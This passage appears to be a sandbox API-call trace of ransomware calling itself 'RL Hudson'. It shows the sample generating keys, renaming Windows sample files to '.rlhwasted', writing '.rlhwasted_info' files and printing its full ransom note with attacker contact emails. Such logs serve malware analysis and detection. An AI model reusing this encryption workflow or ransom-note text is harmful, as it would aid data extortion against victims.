KEY:\r\n[begin_key]ANK0pcZxdD+hc+P7zHYN0cEO3dBCsEFGAsBwyZj+Ox1jFLHbyKLdH88eA3QEaseR\r\ni1KGCSjGBKrE4+xnSPROi5qeJ0ZXAOCf7ym4xKxlopFTWtSqM85OVh6upgGfw9hi\r\nZvAQADH5C1IiV7vtVyYwT+xLrQ/JrjMeECdTr24PZDEAhIcgEtUvMN+x4HRsn2gA\r\n706kYG1niR8AMMzoAUsYWh8FCApMLCPLqt1cCWzKHKHUp5GiiVXPzq6goEZsH0MU\r\nS27/biVKOnY4FI3//FeyfOMbraGm8kz1x1ACVa089Y1FC9iPVUEaYhpXD/zfZW05\r\n6Ib1e3WDJg6l41zRu+9ZenmIKteujdOWXWQsQc1SubuEuYZE9H6OQwfk1ASI9c8v\r\nCpVsdSbVs9bxA+F+raRicW/mOK5qOo1pJnwUuTRjV4hju8Kbk0gNwpEZHdZXsLeS\r\nVSHSYiDwxIdfqV4Etng8vU0/XgGjKtqFIwrhKpb3Nr82kbDVA9ckseCKN/aem3Zf\r\nJeXoa+2kP5RZ6r8gJXv4zFrUcTOd0qc0Z7SSGXj4ASRP+Pd493AFem1G4ZYeYi7t\r\nFll56O9ZGG7AwwxYGqbSUVa16LWbn7RlQLDHX8Jk55NVS43JWKFLYrZPFDbPduMn\r\nitx7dBPVJfGGGG17MT5qABtLr3RnqTY2rAeZ6H/cap/=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.734] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5718 | out: hHeap=0x6b0000) returned 1 [0199.734] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.735] SetEndOfFile (hFile=0x104) returned 1 [0199.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.738] CloseHandle (hObject=0x104) returned 1 [0199.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec548 | out: hHeap=0x6b0000) returned 1 [0199.738] _aulldvrm () returned 0x0 [0199.738] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0199.739] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.739] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.739] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0199.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26e) returned 0x6d4580 [0199.739] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.739] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0199.740] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.740] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.rlhwasted_info" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.742] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.744] SetEndOfFile (hFile=0x104) returned 1 [0199.744] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.744] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.744] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.rlhwasted")) returned 1 [0199.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.rlhwasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0199.782] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.783] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x8064f1 [0199.783] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8064f1) returned 0x16a0000 [0199.783] CloseHandle (hObject=0x124) returned 1 [0200.575] UnmapViewOfFile (lpBaseAddress=0x16a0000) returned 1 [0200.670] CloseHandle (hObject=0x128) returned 1 [0200.679] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0200.690] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0200.697] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0200.697] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.697] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0200.698] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0200.698] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.728] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0200.728] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0200.728] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.728] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BMdU9MrgYnqQI0FvS5KbapXpFsUWb2Hdg1kTPANqVGOfpe2/zV3KPqB0Xd3YAE8v\r\n0wrwFuwHWDNQ4JnvfnFudmCbCTVhc9Pbe24XmlEP6C1XxxyWmu18CLqkKN35Xsko\r\nkCjASgL19zasPLZf6366gBUc8UNKU+5ToBE0L/cXfQzcdvFc/WK9OIme5HrVrKus\r\nre0mvDtKsKeH+X1HUzj/ArQxvn7f+UT/EdE45CMcHqTJJ57zl5jIR8WqU5gP79qy\r\n+yP9OsT/c4GdOLrcs20FAGBsQnYOL/lGGwfzlXg7M8qwHCWcHutEHCg7FDUsc/PK\r\n7PEXC1zNv5jnT5ZCfTkW3leZG8p/9Dmy4IjNgdI2PhWuP9ghNQFgmd8Ha6yC05W+\r\nEt43eztnzVOFZS/qYfKnj3pU67XfMGU5xwDSCM54HFyOam2rcyj2a64cBsERgRg9\r\nmGfezc6MnDQIL7mupjl8WTgxsNGwZQNhEi5tCAtNO+LID8XFJPvFq5dx6oWhEGIS\r\nsml+FBkvXrxBtfotsKO5LtAZBLlSAajbU1eGdSGpLyc1qd6RG7irgMFpie2BIT5D\r\n8neM6FxSZ6nlVZi08P3F7PL+a/d9d+ECHA/nITHQd+6gJL5VdAEvavJe5okKw/OV\r\njhUDIZb0xLsotg0jqt9BfDueyj99yU1s7D2O0m+DjTq=[end_key]\r\nKEEP IT\r\n") returned 981 [0200.728] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0200.728] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0200.729] SetEndOfFile (hFile=0x104) returned 1 [0200.731] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.731] CloseHandle (hObject=0x104) returned 1 [0200.731] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0200.732] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec608 | out: hHeap=0x6b0000) returned 1 [0200.732] _aulldvrm () returned 0x0 [0200.732] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0200.733] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0200.733] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.733] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0200.733] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x286) returned 0x6d4580 [0200.733] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0200.733] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.733] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0200.734] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0200.734] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0200.769] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0200.771] SetEndOfFile (hFile=0x104) returned 1 [0200.771] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.771] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.771] lstrcpyW (in: lpString1=0x6d45fc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0200.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.rlhwasted")) returned 1 [0200.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0200.828] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0200.828] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xd6b22 [0200.828] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd6b22) returned 0x1380000 [0200.828] CloseHandle (hObject=0x124) returned 1 [0201.032] UnmapViewOfFile (lpBaseAddress=0x1380000) returned 1 [0201.040] CloseHandle (hObject=0x10c) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.040] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0201.041] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.041] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.041] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0201.042] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0201.042] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.050] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a8 [0201.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.050] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.050] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Jv5VXJqPA/rhwHA9LxCKkF738xXOddCAezpoiRCsrVAAuZCGz/7ZAnkonFdMMNnq\r\nEMYQyGwNNrL/qx+GzoTg8NwGEP3osEwvrajUjZM2c0RSiAO401cQjRO48GvJ0wF9\r\nbk+X/fbnygk2eXh8SnALPIlJ4yDhZDx8bKVg5N8HF+IIAUyZa9AwB84M5uWlwfR+\r\nLWmOl+RAV5FW+N9KrXVPOGHmS5vMcLmksKnyg9mWgfkJrLuPBRZ0i7i504Dhco6a\r\nu9jAKTWLmNvYTnJJksamlHbSzcbbiolDs7hVaP4tLPwCGTzJ80C2KOWl+uSwr6vz\r\nHJjQ+tCifpTaMcCik0K5bzko4RBs6RjQhj3Lla5AjoFZbsG9unxzTPkOY/DpP7A/\r\nvZSfVJ55144+ZLcc3JjyBbh2NAFIZ10ezISYIkVIUxuNBVb4DOCpDqFFVbQeDDHa\r\n3ph9O5dMJORAwlKdJ86K0JWWVZG2lkYDrsFZtbfmkAC85WfYWUzvNF7wUGVa+47U\r\n5DayYDrMtwV14H/DlDRVTLcfuz4oK366o+ODfcWV15+BZ0/EMmCpKNCpwuWAoAw3\r\nz3fgWRNirLgaxnDFeYqDEc7cyH+EDgZm0zRXcHL03vcJLbiZH/PkGp501lNTAUeJ\r\nVtcfhwJuF+kRJgRkEtLJWv75l0QlXW/RNKA2GLwV+P8=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a8 | out: hHeap=0x6b0000) returned 1 [0201.051] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0201.051] SetEndOfFile (hFile=0x104) returned 1 [0201.053] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.053] CloseHandle (hObject=0x104) returned 1 [0201.053] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0201.053] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9f20 | out: hHeap=0x6b0000) returned 1 [0201.053] _aulldvrm () returned 0x0 [0201.053] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0201.054] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0201.054] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.054] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0201.054] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6d4580 [0201.054] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.054] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.054] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0201.055] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.055] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0201.056] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0201.057] SetEndOfFile (hFile=0x104) returned 1 [0201.057] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.057] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.057] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.rlhwasted")) returned 1 [0201.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0201.058] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0201.058] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xbea1f [0201.058] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbea1f) returned 0x1370000 [0201.058] CloseHandle (hObject=0x10c) returned 1 [0201.154] UnmapViewOfFile (lpBaseAddress=0x1370000) returned 1 [0201.164] CloseHandle (hObject=0x124) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.164] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0201.165] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.165] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.165] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0201.166] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0201.166] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.181] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a8 [0201.181] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.181] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.181] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Q3RYbUbmIV5/Rn3raXiNdflZ4lcA8IiWjCJ/LA6Hf10RwcYgyQYLYmMH97aTcI4T\r\nKj0Q+9tqSXzTCYqC1OJFSASVcMea8BNK283CpajqWIWgfuKVLNDZEWjSpPU9JnMj\r\nY7ACkTho7B+rHauY2SWgytU/2OqzpvWYovVf+aEeFzwJWP5ZYV9crmsrw8GmNmJw\r\nyLKhn5Sxc2c6+CdWwW/MkgzSNbIG9PqAWKglyB63b4t5SzYxiuKF74pGyAGkWn/Z\r\nRDxeKLTKJXBTg+1cWr8aoGVVyQBQDX1eUz5U623BEIjSk5wK+G2HaWsVOXt3U53Q\r\nsyrMGVV3rVBpYNM+g4DNy/sCvRQccmQn49qXRtwpiKzcP+rbvGqhB2ux9AzgbapB\r\nnZVLAX+zL7UnqcVM8u9A8oAWPTr07ZOWB1/fbAkGUXUsa4sBOSTa4jtR+PUNgAJw\r\nHEh3NOGxsdr4JPpk0hyeEtnccSuVszecWt1Y9uSlOFi24WLgTOpRH9wqNIZS0ZHy\r\n1jy3u2hkyEYjaAuIijmAY8DmUnffyp8hyRpMfhS7PncZGBt2EQ1U044PiV8sENwb\r\nWyLIlOdzwcCNr3MH4R/7+NscDMHVpgYUwmE6p/Z4mDZB8tgt7Ls0dlV/SAjL5jT3\r\niAcRrNqtBtjn00ZNbRowAC1MGAnX+Z2licCBxGh0bOZ=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.181] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a8 | out: hHeap=0x6b0000) returned 1 [0201.181] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0201.181] SetEndOfFile (hFile=0x104) returned 1 [0201.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.184] CloseHandle (hObject=0x104) returned 1 [0201.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0201.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0a38 | out: hHeap=0x6b0000) returned 1 [0201.184] _aulldvrm () returned 0x0 [0201.185] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0201.185] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0201.185] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0201.185] RtlAllocateHeap 